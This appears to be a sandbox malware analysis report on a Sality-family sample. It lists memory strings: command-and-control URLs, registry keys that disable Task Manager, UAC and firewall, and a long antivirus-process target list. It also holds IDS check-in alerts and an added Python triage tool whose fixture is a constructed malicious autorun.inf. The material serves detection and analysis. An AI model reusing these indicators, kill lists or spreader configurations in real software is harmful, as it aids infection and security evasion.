        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns6MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_7728SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly Engine v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMB.loghttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRA
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infG
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infT+
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infx?
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infO
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infY
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf3
        Source: jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infO
        Source: jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infY
        Source: jvauyc32.exe, 0000000A.00000003.2331666794.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.2331666794.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf<
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infG
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infk.
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.infx?
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf<
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf3
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.0000000001456000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\autorun.inf
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_01441060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep | 1_2_01441060
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_0143A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread | 1_2_0143A2F5
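The Spreading indicators above (C:\autorun.inf written by the sample, every drive letter from e: to z: opened, and the [AutoRun], shell\explore\Command and shell\Autoplay\command strings in memory) describe the classic removable-drive spreader: an autorun.inf in the drive root whose verbs point at a dropped executable. The Python below is an added triage check, not code from the report or from the malware, that parses such a file tolerantly (case-insensitive section and key names, backslashes in keys, filler lines skipped), reports every entry that would launch an executable, and checks whether the referenced payload actually sits in the drive root. The autorun.inf content and the file name winabcd.exe are constructed for the example. Caveat: Windows 7 and later (and XP/Vista with the 2011 AutoRun update) no longer execute autorun.inf entries from USB storage, so the file does not auto-run on a patched host, but it remains a reliable infection marker and the executable beside it is the artefact to collect.

```python
"""Triage of autorun.inf files found in drive roots (added example, not code from the report)."""
import os
import re
import tempfile

# Extensions Windows would execute from an autorun entry (conservative, well-known set).
EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}
# Keys whose target runs by itself where AutoRun is honoured; verb commands are handled separately.
LAUNCH_KEYS = ("open", "shellexecute")
SHELL_CMD = re.compile(r"^shell\\([^\\]+)\\command$", re.IGNORECASE)

# Constructed sample modelled on the key names in the sample's memory strings
# ([AutoRun], shell\explore\Command, shell\Autoplay\command, win%s.exe).
# winabcd.exe is a placeholder, not an indicator taken from the report.
SAMPLE_AUTORUN_INF = """\
[AutoRun]
;comment line
xq9ktz
open=winabcd.exe
shell\\explore\\Command=winabcd.exe
shell\\Autoplay\\command=winabcd.exe
shell=explore
UseAutoPlay=1
icon=%SystemRoot%\\system32\\SHELL32.dll,4
"""
# Constructed benign file: cosmetic keys only, nothing is launched.
BENIGN_AUTORUN_INF = "[autorun]\nicon=setup.exe,0\nlabel=Product CD\n"


def parse_autorun(text):
    """Case-insensitive parse of the [autorun] section into {key_lower: value}.

    configparser is avoided on purpose: keys contain backslashes, section and key names are
    case-insensitive on Windows, and the file may carry lines that are not key=value pairs
    (the 'xq9ktz' line above), which Windows simply ignores.
    """
    entries, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def _target_of(value):
    """Path part of a value that may carry arguments ('x.exe /s') or an icon index ('x.exe,0')."""
    path = re.split(r"[\s,]", value.strip().strip('"'), maxsplit=1)[0]
    return path, os.path.splitext(path)[1].lower() in EXECUTABLE_EXT


def triage_autorun(text):
    """Return (suspicious, findings); each finding is (key, target, why it matters)."""
    entries = parse_autorun(text)
    findings = []
    for key, value in entries.items():
        target, is_exe = _target_of(value)
        verb = SHELL_CMD.match(key)
        if key in LAUNCH_KEYS and is_exe:
            findings.append((key, target, "runs by itself where AutoRun is honoured"))
        elif verb and is_exe:
            findings.append((key, target, f"replaces the '{verb.group(1).lower()}' verb on the drive's context menu"))
    default = entries.get("shell", "").lower()
    if default and f"shell\\{default}\\command" in entries:
        findings.append(("shell", default, "double-clicking the drive runs the hijacked default verb"))
    if entries.get("useautoplay", "").strip() == "1":
        findings.append(("useautoplay", "1", "asks for AutoPlay handling"))
    return bool(findings), findings


def scan_drive_root(root):
    """Find autorun.inf (any case) in a drive root; report which launch targets exist beside it."""
    for name in os.listdir(root):
        if name.lower() != "autorun.inf":
            continue
        with open(os.path.join(root, name), encoding="utf-8", errors="replace") as fh:
            suspicious, findings = triage_autorun(fh.read())
        targets = {t for k, t, _ in findings if k in LAUNCH_KEYS or SHELL_CMD.match(k)}
        present = sorted(t for t in targets if os.path.exists(os.path.join(root, t)))
        return {"suspicious": suspicious, "findings": findings, "targets_present": present}
    return None


def demo_drive_root():
    """Build a throwaway 'drive root' holding the constructed sample and its payload, then scan it."""
    root = tempfile.mkdtemp(prefix="usbroot_")
    with open(os.path.join(root, "AUTORUN.INF"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_AUTORUN_INF)
    open(os.path.join(root, "winabcd.exe"), "wb").close()  # empty stand-in for the dropped payload
    return scan_drive_root(root)


if __name__ == "__main__":
    for key, target, why in demo_drive_root()["findings"]:
        print(f"{key:<26} -> {target:<12} {why}")
```

Point scan_drive_root at the root of a mounted drive image during triage; a hit with targets_present non-empty means the payload is still there to hash and submit. The check is file-based only and says nothing about whether the host would have executed it, which is exactly the distinction the caveat above draws.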

        Networking

        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49730 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49730 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49719 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49719 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49736 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49736 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49729 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49725 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49737 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49707 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49712 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49806 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49731 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:49733 -> 194.5.152.215:80
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49738 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49738 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49728 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49709 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49709 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49728 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49732 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49767 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49767 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49814 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49784 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49759 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49716 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49814 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49732 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49722 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49835 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49726 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49722 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49842 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49842 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49726 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49723 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49861 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49741 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49741 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49870 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49727 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49870 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49918 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49889 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49927 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49724 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49735 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49789 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49789 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49724 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50039 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50037 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50039 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50036 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50049 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49899 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49899 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50045 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50037 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49927 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50056 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:49867 -> 194.5.152.215:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50040 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50051 -> 185.53.178.50:80
        Source: Network traffic | Suricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50043 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50045 -> 190.120.227.91:8080
        Source: Network traffic | Suricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50056 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50042 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50028 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50043 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50028 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49949 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50050 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50050 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50041 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:49983 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50064 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50061 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49983 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:50031 -> 194.5.152.215:80
        Source: Network trafficSuricata IDS: 2816165 - Severity 1 - ETPRO MALWARE Win32/Neutrino checkin 4 : 192.168.2.9:50063 -> 194.5.152.215:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50041 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50027 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50030 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50030 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50038 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50052 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50052 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50029 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50059 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50001 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50032 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50053 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50034 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.9:50033 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:50033 -> 190.120.227.91:8080
